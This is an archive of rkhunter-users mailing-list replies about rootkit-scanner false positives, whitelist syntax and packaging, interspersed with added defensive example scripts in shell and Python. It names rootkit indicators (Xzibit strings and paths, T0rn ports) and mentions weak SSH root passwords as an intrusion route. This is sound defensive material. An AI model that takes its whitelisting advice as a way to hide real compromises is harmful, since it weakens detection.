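The string check and its whitelist, as an added example rather than rkhunter's own code. The two whitelist forms come from the threads themselves (a bare path in this message, path:string in the Xzibit thread of 2011-07-27); that an entry of the form path:string suppresses only that one string for that one file is this example's reading of the syntax and is not taken from rkhunter's source. The startup files are constructed in a temporary directory, and the function names whitelisted, scan_strings and count_hits are this example's own.

```sh
#!/bin/sh
# Added example (not rkhunter's own code): a small "possible rootkit
# strings" check over startup files, with a whitelist that accepts the
# two forms seen in the threads:
#   RTKT_FILE_WHITELIST=/etc/init.d/boot.local          (whole file)
#   RTKT_FILE_WHITELIST=/etc/rc.d/rc.sysinit:hdparm     (file:string)
# The matching rule for the second form is this example's assumption.

# String/rootkit pairs the check looks for (constructed; only the
# 'hdparm' -> Xzibit pair from the thread).
STRINGS="hdparm:Xzibit"

# whitelisted FILE STRING WHITELIST
# Returns 0 if WHITELIST (space separated) contains FILE or FILE:STRING.
whitelisted() {
    for entry in $3; do
        if [ "$entry" = "$1" ] || [ "$entry" = "$1:$2" ]; then return 0; fi
    done
    return 1
}

# scan_strings FILES WHITELIST
# Prints one warning line per (file, string) hit not covered by the
# whitelist, in the log's wording; prints nothing when all is clear.
scan_strings() {
    for f in $1; do
        [ -f "$f" ] || continue
        for pair in $STRINGS; do
            s=${pair%%:*}
            rk=${pair#*:}
            if grep -q "$s" "$f" && ! whitelisted "$f" "$s" "$2"; then
                echo "Found string '$s' in file '$f'. Possible rootkit: $rk Rootkit"
            fi
        done
    done
}

# count_hits FILES WHITELIST -> number of warning lines
count_hits() { scan_strings "$1" "$2" | wc -l | tr -d ' '; }

# --- constructed startup files ----------------------------------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/init.d"
printf '#!/bin/sh\nhdparm -d1 /dev/hda   # force DMA on an old disk\n' > "$DEMO/init.d/boot.local"
printf '#!/bin/sh\necho starting pciparm\n' > "$DEMO/init.d/pciparm"
printf '#!/bin/sh\nhdparm -S 120 /dev/sda\n' > "$DEMO/init.d/hdparm"
FILES="$DEMO/init.d/boot.local $DEMO/init.d/pciparm $DEMO/init.d/hdparm"

echo "no whitelist:"
scan_strings "$FILES" ""
echo "boot.local whitelisted, hdparm only for the hdparm script:"
scan_strings "$FILES" "$DEMO/init.d/boot.local $DEMO/init.d/hdparm:hdparm"
```

The path:string form is the more conservative choice: it keeps the file under observation for every other string while silencing the one known false positive, whereas a bare path excludes the file from this check entirely.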


Re: [Rkhunter-users] rcs files

2010-05-09 Thread Helmut Hullen
Hello, John,

You wrote on 09.05.10:

>>> Why are you whitelisting this file? It is not checked for as a
>>> rootkit file.
>>
>> You can see the reason in the remark line: "rkhunter" guessed there
>> might be a "xzibit" virus. Together with "/etc/init.d/boot.local".

> Ah, okay. I assume the file (boot.local) contains 'hdparm' in it?

You're right - for forcing DMA on. And there are still machines which
need it that way.

Best regards!
Helmut



Re: [Rkhunter-users] rcs files

2010-05-09 Thread Helmut Hullen
Hello, John,

You wrote on 09.05.10:

>> RTKT_FILE_WHITELIST=/etc/init.d/RCS/boot.local.neu,v
>> # because of Xzibit

> Why are you whitelisting this file? It is not checked for as a
> rootkit file.

You can see the reason in the remark line: "rkhunter" guessed there  
might be a "xzibit" virus. Together with "/etc/init.d/boot.local".

"boot.local" is a script with 85 lines and 2 kByte - may I post it here?

Kind regards!
Helmut


Re: [Rkhunter-users] howto requested: eliminate Dica-Kit Rootkit

2010-05-07 Thread Helmut Hullen
Hello, Michael,

You wrote on 07.05.10:


> Today I ran the rkhunter-1.3.6, first with the --propupd, and got:
> sudo rkhunter --propupd[ Rootkit Hunter version 1.3.6 ]
> File updated: searched for 156 files, found 83, missing hashes 83

=>> Are the missing hashes a problem for the check?

No problem. (perhaps ...)

> When running the check, it found the "Dica-Kit Rootkit", here is an
> excerpt of the log file:

> [15:01:32] Checking for Dica-Kit Rootkit...

> [15:01:33] Checking for file '/etc/sshd_config'[ Found ]

[...]

> [15:01:34] Warning: Dica-Kit Rootkit   [ Warning ]
> [15:01:34]File '/etc/sshd_config' found

> I then checked the file '/etc/sshd_config' but did not know what to
> look for.

I don't know how OS-X is organized; under Linux the file "sshd_config"  
should be in the directory "/etc/ssh".


> Then the test continued and there was warning no 2:

> [15:02:38]   Performing check for possible rootkit strings
> [15:02:38] Info: Starting test name 'possible_rkt_strings'
> [15:02:38] Info: Using system startup paths: /etc/rc.d /etc/rc.local
> /usr/local/etc/rc.d /usr/local/etc/rc.local /etc/conf.d/local.start
> /etc/init.d /etc/inittab
> [15:02:38] Warning: Checking for possible rootkit strings [ Warning ]
> [15:02:39]  No system startup files found.

Maybe these warnings show up because "rkhunter" doesn't know that it runs on a Mac.

> [14:49:56] /bin/bash   [ Warning ]
>
> [14:49:56] Warning: No hash value found for file '/bin/bash' in the
> rkhunter.dat file.

Hmmm - what about "missing hashes" ...?

> I also googled the Dica-Kit rootkit, the Sophos website
> http://www.sophos.com/security/analyses/viruses-and-spyware/trojdicak
> it.html contains the following information:

> "Troj/Dica-Kit is a rootkit for the Linux operating sytem. ... The
> rootkit replaces several system binaries such as netstat, tcpd, ls,
> ps, pstree, top, read, write and ifconfig with its own versions that
> hide the files, processes and network connections of the Trojan. ...

Maybe it's a warning only because you haven't told rkhunter that it runs on a Mac.

But it's (as far as I can guess) not impossible that your system is corrupted by a virus; "--propupd" doesn't remove viruses etc., it makes hashes of some existing files and believes they are clean (only if the hash value changes some time later does rkhunter warn you).

Kind regards!
Helmut


[Rkhunter-users] rcs files

2010-05-05 Thread Helmut Hullen
Hello,

"rkhunter" seems to have a problem with "*,v" files (which are typical  
for rcs files):

"rkhunter.conf":

RTKT_FILE_WHITELIST=/etc/init.d/RCS/boot.local.neu,v
# because of Xzibit


"rkhunter.log":

Whitelisted rootkit file does not exist: /etc/init.d/RCS/boot.local.neu
Whitelisted rootkit file does not exist: v



How can I declare whitelisted files with the extension ",v"?

Kind regards!
Helmut
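The comma problem above (and the "directory must exist" problem for RTKT_DIR_WHITELIST raised in the "/dev/ida" messages elsewhere on this page) is exactly what a whitelist consistency check would surface. The following Python script is an added example, not rkhunter's own code: it parses the two whitelist options named in these messages from rkhunter.conf-style text, optionally splits values at commas the way the log lines above show rkhunter doing, and reports entries that do not exist on disk. The sample configuration and the temporary directory tree it is checked against are constructed for the demo.

```python
"""Consistency check for rkhunter-style whitelist entries (added example, not rkhunter code)."""
import os
import re
import tempfile

# The two whitelist options that appear in these messages.  RTKT_DIR_WHITELIST
# entries must be directories, RTKT_FILE_WHITELIST entries must be files.
WHITELIST_OPTIONS = ("RTKT_FILE_WHITELIST", "RTKT_DIR_WHITELIST")


def parse_whitelist(conf_text, split_on_comma=True):
    """Return (option, path) pairs from rkhunter.conf-style text.

    With split_on_comma=True a value is split at whitespace and commas, which
    reproduces what the log lines above show for 'boot.local.neu,v': two
    entries, '/etc/init.d/RCS/boot.local.neu' and 'v'.  With
    split_on_comma=False the value is taken literally.
    """
    entries = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key not in WHITELIST_OPTIONS:
            continue
        parts = re.split(r"[\s,]+", value) if split_on_comma else value.split()
        entries.extend((key, part) for part in parts if part)
    return entries


def check_whitelist(conf_text, root="/", split_on_comma=True):
    """Return the whitelist entries that do not exist under root.

    A whitelisted path that is absent is dead configuration at best; at worst
    it pre-approves a path that something may create later.  'root' lets the
    check run against a staging tree instead of the live system.
    """
    missing = []
    for option, path in parse_whitelist(conf_text, split_on_comma):
        full = os.path.join(root, path.lstrip("/"))
        if option == "RTKT_DIR_WHITELIST":
            present = os.path.isdir(full)
        else:
            present = os.path.isfile(full)
        if not present:
            missing.append((option, path))
    return missing


# Constructed sample in rkhunter.conf syntax; the paths are the ones from these messages.
SAMPLE_CONF = """
RTKT_FILE_WHITELIST=/etc/init.d/boot.local
# because of Xzibit
RTKT_FILE_WHITELIST=/etc/init.d/RCS/boot.local.neu,v
RTKT_DIR_WHITELIST=/dev/ida
"""


def demo():
    """Build a throwaway tree holding the two files and run both parsings."""
    root = tempfile.mkdtemp()
    for rel in ("etc/init.d/boot.local", "etc/init.d/RCS/boot.local.neu,v"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    # /dev/ida is deliberately not created: with udev and no ida controller
    # the directory does not exist, the situation described in the
    # "/dev/ida" messages on this page.
    return (check_whitelist(SAMPLE_CONF, root, split_on_comma=True),
            check_whitelist(SAMPLE_CONF, root, split_on_comma=False))


if __name__ == "__main__":
    split_result, literal_result = demo()
    for option, path in split_result:
        print(f"comma-split: {option} entry does not exist: {path}")
    for option, path in literal_result:
        print(f"literal:     {option} entry does not exist: {path}")
```

With comma splitting the check reports the two halves of the ",v" file plus the absent "/dev/ida" directory; taken literally, only "/dev/ida" is reported. Running such a check against a staging tree before deploying rkhunter.conf catches both kinds of mistake without waiting for the next scan's log.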


Re: [Rkhunter-users] Possible Root Kit?

2010-05-02 Thread Helmut Hullen
Hello, Sportsman,

You wrote on 02.05.10 on the subject RE: [Rkhunter-users] Possible Root Kit?:

>>> Warning: Network TCP port 47107 is being used by
>>> /usr/local/apache/bin/httpd. Possible rootkit: T0rn

>>>  Use the 'lsof -i' or 'netstat -an' command to check this.

>> Have you tried these commands?

> Yeah I tried both of the commands but I have no idea what I'm looking
> at or what it means.

What is the output of these commands?

Kind regards!
Helmut


Re: [Rkhunter-users] Possible Root Kit?

2010-05-02 Thread Helmut Hullen
Hello, Sportsman,

You wrote on 01.05.10:

> Warning: Network TCP port 47107 is being used by
> /usr/local/apache/bin/httpd. Possible rootkit: T0rn

>  Use the 'lsof -i' or 'netstat -an' command to check this.

Have you tried these commands?

It's a good idea to look for the last clean backup ...

Kind regards!
Helmut


Re: [Rkhunter-users] Re RKH permissions

2010-04-28 Thread Helmut Hullen
Hello, gordy,

You wrote on 29.04.10:

> I am not a part of the RKH team but they let me maintain the wiki.

> I have taken a hint and improved the wiki slightly by adding the root
> permission bit to the intro of the wiki.

> https://sourceforge.net/apps/trac/rkhunter/wiki/MPRKH

> I suggest you read the wiki and feel free to private email me or post
> thru the mailing list.

It's a fine Wiki - thank you!

Kind regards!
Helmut


Re: [Rkhunter-users] Newer User

2010-04-28 Thread Helmut Hullen
Hello, john,

You wrote on 28.04.10:

> I am new to using RKhunter.  I am getting some warnings.  I am pretty
> sure they are caused by updates I have taken.

> Could someone take a look for me and confirm what I am thinking?  If
> someone would like to help I will post my log file as a reply. If
> there is another log that will help confirm what I am thinking I will
> try to post that as well.

http://sourceforge.net/apps/trac/rkhunter/wiki/MPRKH#Contents

(I've just seen it - it's fine!)

Perhaps you need the paragraphs

Commands --propupd and --update

First Scan

Check Log and modify CONF

Kind regards!
Helmut


Re: [Rkhunter-users] Re RKH permissions

2010-04-28 Thread Helmut Hullen
Hello, Call,

You wrote on 29.04.10:

> Re RKHunter.

> Did the scanning. Great. Interesting results worthy of further
> investigation. Instruction - see log file. Go to open log file using
> occasionally stupid Gedit, permission denied, must be root to view.
> Tried with several better text editors; Kate, Leaf? etc.

What do you want to edit in the log file?
A simple text viewer can do the job (ok - I prefer "mc").

And because running "rkhunter" is a root job, it's a good choice to allow only root to view the results.

Kind regards!
Helmut


Re: [Rkhunter-users] Many Warnings after RHEL4 system update.

2010-02-22 Thread Helmut Hullen
Hello, White,

You wrote on 22.02.10:

> After a big update on RHEL4 I now get all these warnings, before I
> only had a couple,  how can I clear that up?


> Performing file properties checks
> Checking for prerequisites[ OK ]
> /bin/awk  [ OK ]
> /bin/basename [ Warning ]
> /bin/bash [ Warning ]

(etc.)

Have you run

rkhunter --propupd

after installing new binaries?

Kind regards!
Helmut


Re: [Rkhunter-users] whitelisting "/dev/ida"

2010-02-08 Thread Helmut Hullen
Hello, John,

You wrote on 07.02.10 on the subject Re: [Rkhunter-users] whitelisting "/dev/ida":

>> I can put a line
>>
>>   RTKIT_DIR_WHITELIST=/dev/ida

> That should be 'RTKT_DIR_WHITELIST'.

Was a typo in my mail, not in "rkhunter.conf" - sorry.

>> into "/etc/rkhunter.conf", but then I see two problems:
>>
>> 1) "rkhunter" finds no entries like "/dev/ida/.inet/logclear"
>>

> Seems to work fine for me. From my log file:

> [20:58:11]   Checking for directory '/dev/ida/.inet'[ Found ]
> [20:58:11] Warning: Xzibit Rootkit  [ Warning ]
> [20:58:11]  File '/dev/ida/.inet/logclear' found
> [20:58:11]  Directory '/dev/ida/.inet' found

You're right - I hadn't tested this behaviour (with a handmade "/dev/ida/.inet/logclear") but only assumed.

The main problem (in my installations, with hard coded "/dev/ida",  
without "udev") therefore doesn't exist - ok.

>> 2) a comment in "rkhunter.conf" says the directory must exist - if
>> "udev" is running and no "ida" device exists then "udev" doesn't
>> produce a "/dev/ida" directory.
>>
>> Any solution?

> I'm currently thinking, but have not discussed this with the
> developers yet, that maybe we can relax RKH from being so strict, but
> provide a 'consistency' option by which RKH will check that all
> configured/whitelisted files/dirs/pathnames do exist.

[...]

Sounds good - thank you!

Kind regards!
Helmut


[Rkhunter-users] whitelisting "/dev/ida"

2010-02-07 Thread Helmut Hullen
Hello, rkhunter-users,

I run a distribution which uses no "/udev" (it doesn't need hot plugging  
detection etc.). It needs (for running on old machines) "/dev/ida".

"rkhunter" detects this directory as "possible rootkit" - ok.

I can put a line

  RTKIT_DIR_WHITELIST=/dev/ida

into "/etc/rkhunter.conf", but then I see two problems:

1) "rkhunter" finds no entries like "/dev/ida/.inet/logclear"
2) a comment in "rkhunter.conf" says the directory must exist - if  
"udev" is running and no "ida" device exists then "udev" doesn't produce  
a "/dev/ida" directory.

Any solution?

Kind regards!
Helmut


Re: [Rkhunter-users] Apache2 installed but application httpd not found

2010-01-31 Thread Helmut Hullen
Hello, Christian,

You wrote on 31.01.10:

>> Unfortunatelly, Apache2 process name is apache2 and not httpd, so
>> this check will not succeed.
>> I have the same problem on same OS.

> Hm ok.
> I tried to add the check for apache2. But didn't succeed.

> So I created a symlink /usr/sbin/httpd which points to
> /usr/sbin/apache2.
->> ln -s /usr/sbin/apache2 /usr/sbin/httpd

> Now rkhunter finds httpd which is apache2.

That's an ugly debianism (and Ubuntu makes the same crap).

Maybe "readlink -f apache2" is more reliable.

Kind regards!
Helmut


Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

2010-01-27 Thread Helmut Hullen
Hello, Chris,

You wrote on 27.01.10:

>>> or
>>> chmod 744 /usr/bin/rkhunter

>> and that may not work - "755" is a better proposal.

> Would 744 not be the same thing as o+x (in this case)?

No. 744 is rwxr--r--

"chmod o+x" changes this pattern to

   rwxr--r-x

I prefer running rkhunter not only from root, but from everybody, and then 755 is the best pattern.

745 is not impossible, but looks strange.

Kind regards!
Helmut


Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

2010-01-26 Thread Helmut Hullen
Hello, gumper,

You wrote on 26.01.10:

> [r...@archlinux gumper]# rkhunter -c
> bash: /usr/bin/rkhunter: Permission denied

> The file seems to have the right permissions.

> [r...@archlinux gumper]# ls -l /usr/bin/rkhunter
> -rw-r--r-- 1 root root 425660 Jan 26 19:46 /usr/bin/rkhunter

Does "archlinux" really distribute "rkhunter" with these permissions?  
Strange.

Kind regards!
Helmut


Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

2010-01-26 Thread Helmut Hullen
Hello, Chris,

You wrote on 26.01.10:

>> The file seems to have the right permissions.
>>
>> [r...@archlinux gumper]# ls -l /usr/bin/rkhunter
>> -rw-r--r-- 1 root root 425660 Jan 26 19:46 /usr/bin/rkhunter

> Try setting the executable bit :)
> chmod o+x /usr/bin/rkhunter

That should work

> or
> chmod 744 /usr/bin/rkhunter

and that may not work - "755" is a better proposal.

Kind regards!
Helmut


Re: [Rkhunter-users] español spanish

2009-11-08 Thread Helmut Hullen
Hello, david,

You wrote on 07.11.09:

> hello, I think that my computer is infected; I'm using Linux Mint


> Checking /dev for suspicious file types  [ Warning ]

No problem.

> rkhunter -c -sk


> Checking /dev for suspicious file types  [Warning ]

No problem.

Kind regards!
Helmut


Re: [Rkhunter-users] Inetd services whitelisting?

2009-10-08 Thread Helmut Hullen
Hello, John,

You wrote on 08.10.09:

> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
> please report if it works with Rootkit Hunter version 1.3.4?

> Solaris users will generally need to use the inetd whitelisting
> (unless they have no inetd services running). RKH wouldn't have got
> past testing if it didn't work :-)

> Whitelisting depends partially on whether Solaris 9 or 10 is being
> used. Inetd was changed a fair bit at Solaris 10.

I'm running Linux on my machine - if I remember correctly I had to uncomment the mentioned lines in "rkhunter.conf".

Kind regards!
Helmut


Re: [Rkhunter-users] Inetd services whitelisting?

2009-10-08 Thread Helmut Hullen
Hello, unspawn,

You wrote on 07.10.09:

>>> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
>>> please report if it works with Rootkit Hunter version 1.3.4?

>> Works. Since many versions, up to 1.3.4

[imported from e-mail]

> I'm
> trying to troubleshoot an issue with a user using inetd
> whitelisting. Unfortunately I do not posess a machine with inetd
> running. Could you please assist us and supply me with one line
> from your inetd conf with a /path/tobinary name and the
> corresponding rkhunter.conf whitelisting line?

#  rkhunter.conf 
# --- partial ---

INETD_CONF_PATH=/etc/inetd.conf

#
# Allow the following enabled xinetd services.
# Only one service per line (use multiple INETD_ALLOWED_SVC lines).
#
# Below are some Solaris 9 and 10 services that may want to be whitelisted.
#
#INETD_ALLOWED_SVC=echo
#INETD_ALLOWED_SVC=/network/rpc-100235_1/rpc_ticotsord
#INETD_ALLOWED_SVC=/network/rpc-100083_1/rpc_tcp
#INETD_ALLOWED_SVC=/network/rpc-100068_2-5/rpc_udp

INETD_ALLOWED_SVC=time
INETD_ALLOWED_SVC=ftp
INETD_ALLOWED_SVC=tftp
INETD_ALLOWED_SVC=telnet
INETD_ALLOWED_SVC=auth
INETD_ALLOWED_SVC=finger
INETD_ALLOWED_SVC=pop3
INETD_ALLOWED_SVC=imap2

# INETD_ALLOWED_SVC=rembo
# INETD_ALLOWED_SVC=swat
# INETD_ALLOWED_SVC=cvs



# --- inetd.conf ---
# --- partial --
time    stream  tcp     nowait      root    internal
time    dgram   udp     wait        root    internal

ftp     stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/proftpd
telnet  stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/in.telnetd

finger  stream  tcp     nowait      daemon  /usr/sbin/tcpd  /usr/sbin/in.fingerd -s -l
auth    stream  tcp     nowait.200  nobody  /usr/sbin/in.identd  in.identd -N
pop3    stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/popa3d
imap2   stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/imapd

# --

Kind regards!
Helmut
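To make the pairing of inetd.conf and INETD_ALLOWED_SVC above concrete, here is an added example in Python, not rkhunter code and not from the mail: it extracts the enabled services from inetd.conf text, collects the INETD_ALLOWED_SVC lines from rkhunter.conf text, and reports enabled services that are not on the allow list (what the check warns about) as well as allowed services that are not enabled (stale whitelist entries). The inetd.conf sample is the partial one above plus a constructed "swat" line that is deliberately not allowed and a constructed disabled "pop2" line.

```python
"""Enabled inetd services versus an INETD_ALLOWED_SVC allow list (added example, not rkhunter code)."""


def enabled_inetd_services(inetd_conf_text):
    """Return service names enabled in inetd.conf text, in file order.

    inetd.conf columns: service socket-type protocol wait/nowait[.max] user
    server-program [server-args].  Lines beginning with '#' are disabled
    services or comments.  A service may appear twice (tcp and udp); both
    occurrences are kept because a checker looks at each line.
    """
    services = []
    for raw in inetd_conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed; a real checker should warn rather than skip
        services.append(fields[0])
    return services


def allowed_services(rkhunter_conf_text):
    """Collect INETD_ALLOWED_SVC values (one service per line, as rkhunter.conf requires)."""
    allowed = set()
    for raw in rkhunter_conf_text.splitlines():
        line = raw.strip()
        if line.startswith("INETD_ALLOWED_SVC="):
            allowed.add(line.split("=", 1)[1].strip())
    return allowed


def unexpected_services(inetd_conf_text, rkhunter_conf_text):
    """Enabled services missing from the allow list: what the check would warn about."""
    allowed = allowed_services(rkhunter_conf_text)
    return [svc for svc in enabled_inetd_services(inetd_conf_text) if svc not in allowed]


def stale_allowances(inetd_conf_text, rkhunter_conf_text):
    """Allowed services that are not enabled: whitelist entries that silence nothing today."""
    return allowed_services(rkhunter_conf_text) - set(enabled_inetd_services(inetd_conf_text))


# Partial inetd.conf from the mail above, plus one constructed swat line and
# one constructed disabled pop2 line.
INETD_CONF = """\
time    stream  tcp     nowait      root    internal
time    dgram   udp     wait        root    internal
ftp     stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/proftpd
telnet  stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/in.telnetd
finger  stream  tcp     nowait      daemon  /usr/sbin/tcpd  /usr/sbin/in.fingerd -s -l
auth    stream  tcp     nowait.200  nobody  /usr/sbin/in.identd  in.identd -N
pop3    stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/popa3d
imap2   stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/imapd
#pop2   stream  tcp     nowait      root    /usr/sbin/tcpd  /usr/sbin/ipop2d
swat    stream  tcp     nowait.400  root    /usr/sbin/swat  swat
"""

# The allow list from the mail above (commented lines stay disabled).
RKHUNTER_CONF = """\
INETD_CONF_PATH=/etc/inetd.conf
#INETD_ALLOWED_SVC=echo
INETD_ALLOWED_SVC=time
INETD_ALLOWED_SVC=ftp
INETD_ALLOWED_SVC=tftp
INETD_ALLOWED_SVC=telnet
INETD_ALLOWED_SVC=auth
INETD_ALLOWED_SVC=finger
INETD_ALLOWED_SVC=pop3
INETD_ALLOWED_SVC=imap2
# INETD_ALLOWED_SVC=swat
"""

if __name__ == "__main__":
    for svc in unexpected_services(INETD_CONF, RKHUNTER_CONF):
        print(f"Warning: inetd service '{svc}' is enabled but not whitelisted")
    for svc in sorted(stale_allowances(INETD_CONF, RKHUNTER_CONF)):
        print(f"Note: '{svc}' is whitelisted but not enabled")
```

The allow list only silences the warning; reviewing the enabled list itself (telnet, ftp, finger and pop3 in the sample all carry credentials in the clear) is the part of the exercise that actually reduces exposure.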


Re: [Rkhunter-users] Inetd services whitelisting?

2009-10-07 Thread Helmut Hullen
Hello, unspawn,

You wrote on 07.10.09:

> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
> please report if it works with Rootkit Hunter version 1.3.4?

Works. Since many versions, up to 1.3.4

Kind regards!
Helmut


[Rkhunter-users] wget and netrc

2009-04-29 Thread Helmut Hullen
Hello,

could you please change the order of download programs in WEBCMDLIST or the options of these programs?

The first program in the list is wget, and wget uses .netrc. And therefore it reports (without other options for wget) the passwords in .netrc on and on.

I've put wget behind lynx - works (now the first program is curl, and curl doesn't show the sensitive contents of .netrc).

Kind regards!
Helmut


Re: [Rkhunter-users] How do rootkits get installed on a machine?

2009-02-12 Thread Helmut Hullen
Hello, Nigel,

You wrote on 09.02.09:

> How do rootkits get installed on your machine?

> For example. Would you have to have an Internet accessible webserver,
> or ssh server available?

One simple way:
SSH-accessible server, with a simple "root" password.

You have to wait 1 day (max.), and then your system belongs to another guy.

Kind regards!
Helmut
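The scenario above is decided by two sshd_config directives, so a defender's first check is the configuration file itself. The following Python is an added example, not part of the thread or of rkhunter: it reads the global section of an sshd_config, applies sshd's rule that the first occurrence of a keyword wins, and flags PermitRootLogin and PasswordAuthentication values that still permit a password login as root. The weak and hardened sample configurations are constructed.

```python
"""Flag sshd_config settings that leave root open to password guessing (added example)."""

# Values that close off password logins as root.  'without-password' is the
# older spelling of 'prohibit-password'.
SAFE_VALUES = {
    "permitrootlogin": {"no", "prohibit-password", "without-password"},
    "passwordauthentication": {"no"},
}


def parse_sshd_config(text):
    """Return {keyword: value} for the global section of sshd_config text.

    Keywords are case-insensitive and sshd uses the first occurrence of each,
    so later duplicates are ignored.  Parsing stops at the first Match line
    because everything after it applies only to matching connections.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip().lower()
        if keyword == "match":
            break
        settings.setdefault(keyword, value)
    return settings


def weak_settings(text):
    """Return (keyword, effective value) pairs that still allow a root password login.

    A keyword that is not set is reported as 'unset' because the compiled-in
    default differs between OpenSSH versions; only an explicit value is
    conclusive.
    """
    settings = parse_sshd_config(text)
    findings = []
    for keyword, safe in SAFE_VALUES.items():
        value = settings.get(keyword, "unset")
        if value not in safe:
            findings.append((keyword, value))
    return findings


# Constructed samples: the setting the mail describes, and its corrected form.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
# sshd keeps the first value of a keyword, so this duplicate changes nothing.
PermitRootLogin yes
# Lines after Match apply to that user only; this example checks the global policy.
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, weak_settings(cfg) or "no findings")
```

The "unset" finding is deliberate: an sshd_config that never mentions PermitRootLogin inherits whatever the installed OpenSSH version defaults to, and the only way to make the policy auditable is to state it.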


Re: [Rkhunter-users] The Rootkit Hunter project team announces release 1.3.4

2009-01-13 Thread Helmut Hullen
Hello,

I wrote on 13.01.09:

>>> thank you, but where is the download?

>> You mean it isn't at
>> http://sourceforge.net/project/platformdownload.php?group_id=155034

> [...]

> There seems something wrong.

[...]


> When I change "--install" to "--show", the script tells

> PREFIX: /tmp/rkhunter
> Application:/tmp/rkhunter/bin
> Configuration file: /tmp/rkhunter/etc
> Documents:  /tmp/rkhunter/share/doc/rkhunter-1.3.4
> Man page:   /tmp/rkhunter/share/man/man8
> Scripts:/tmp/rkhunter/lib/rkhunter/scripts
> Databases:  /tmp/rkhunter/var/lib/rkhunter/db
> Temporary files:/tmp/rkhunter/var/lib/rkhunter/tmp

> Got STRIPROOT="/tmp/rkhunter"

> 

> That's not good - the documents have to go to "/usr/share", not to
> "share". Same with "scripts".

I tried the patch "rkhunter-tgz.diff" from



(thanks to UnSpawn); works well.

cd /path/to/rkhunter-1.3.4
TGZ_BUILD_ROOT=/tmp/rkhunter
mkdir -p $TGZ_BUILD_ROOT
export TGZ_BUILD_ROOT
./installer.sh --layout TGZ --install

produces the files for a tarball in "/tmp/rkhunter", (nearly) ready for a Slackware package.

  http://arktur.shuttle.de/CD/Testpakete/rkhunter-1.3.4-noarch-3hln.tgz

is a package which is completely ready (it doesn't destroy "/etc/rkhunter.conf" if it exists).

Kind regards!
Helmut


Re: [Rkhunter-users] The Rootkit Hunter project team announces release 1.3.4

2009-01-13 Thread Helmut Hullen
Hello, unspawn,

You wrote on 31.12.08 on the subject Re: [Rkhunter-users] The Rootkit Hunter
project team announces release 1.3.4:

>> thank you, but where is the download?

> You mean it isn't at
> http://sourceforge.net/project/platformdownload.php?group_id=155034

[...]

There seems something wrong.

I have "compiled" it with the script

#! /bin/bash

# Build root for the package ("Ziel" is German for "target").
Ziel=/tmp/rkhunter
rm -rf $Ziel
mkdir -p $Ziel/usr

# Install into the build root with the custom layout; stdout and stderr
# go to separate log files.
./installer.sh --layout custom $Ziel \
 --striproot $Ziel --install > install.log 2>installerr.log
#

When I change "--install" to "--show", the script tells

PREFIX: /tmp/rkhunter
Application:/tmp/rkhunter/bin
Configuration file: /tmp/rkhunter/etc
Documents:  /tmp/rkhunter/share/doc/rkhunter-1.3.4
Man page:   /tmp/rkhunter/share/man/man8
Scripts:/tmp/rkhunter/lib/rkhunter/scripts
Databases:  /tmp/rkhunter/var/lib/rkhunter/db
Temporary files:/tmp/rkhunter/var/lib/rkhunter/tmp

Got STRIPROOT="/tmp/rkhunter"



That's not good - the documents have to go to "/usr/share", not to  
"share". Same with "scripts".

I don't want "rkhunter" somewhere under "/usr/local".


I made a Slackware package;

  http://arktur.shuttle.de/CD/Testpakete/rkhunter-1.3.4-noarch-1hln.tgz

When I run this package (after installation in the Slackware way)

/bin/rkhunter --update

I get the log file

[15:49:12] Running Rootkit Hunter version 1.3.4 on Izar
[15:49:12]
[15:49:12] Info: Start date is Di 13. Jan 15:49:12 CET 2009
[15:49:12]
[15:49:12] Checking configuration file and command-line options...
[15:49:12] Info: Detected operating system is 'Linux'
[15:49:12] Info: Uname output is 'Linux Izar.wm8.hullen.de 2.6.25.19-ODS #1 SMP 
PREEMPT Fri Oct 24 14:22:17 CEST 2008 i686 Pentium III (Coppermine) 
GenuineIntel GNU/Linux'
[15:49:13] Info: Command line is /usr/bin/rkhunter --update
[15:49:13] Info: Environment shell is /bin/bash; rkhunter is using bash
[15:49:13] Info: Using configuration file '/usr/etc/rkhunter.conf'
[15:49:13] Info: Installation directory is '/usr'
[15:49:13] Info: Using language 'en'
[15:49:13] Info: Using '/usr/var/lib/rkhunter/db' as the database directory
[15:49:13] Info: Using '/usr/lib/rkhunter/scripts' as the support script 
directory
[15:49:13] Info: Using '/sbin /usr/sbin /usr/local/bin /usr/bin /bin /usr/games 
/root/bin /usr/lib/qt/bin /bin /usr/bin /sbin /usr/sbin /usr/local/bin 
/usr/local/sbin /usr/libexec /usr/local/libexec' as the command directories
[15:49:13] Info: Using '/' as the root directory by default
[15:49:13] Info: Using '/usr/var/lib/rkhunter/tmp' as the temporary directory

[...]

There are wrong paths: I started "/bin/rkhunter", not "/usr/bin/rkhunter". Wrong configuration path, wrong scripts path, wrong temp path.

Where is the mistake?

Kind regards!
Helmut
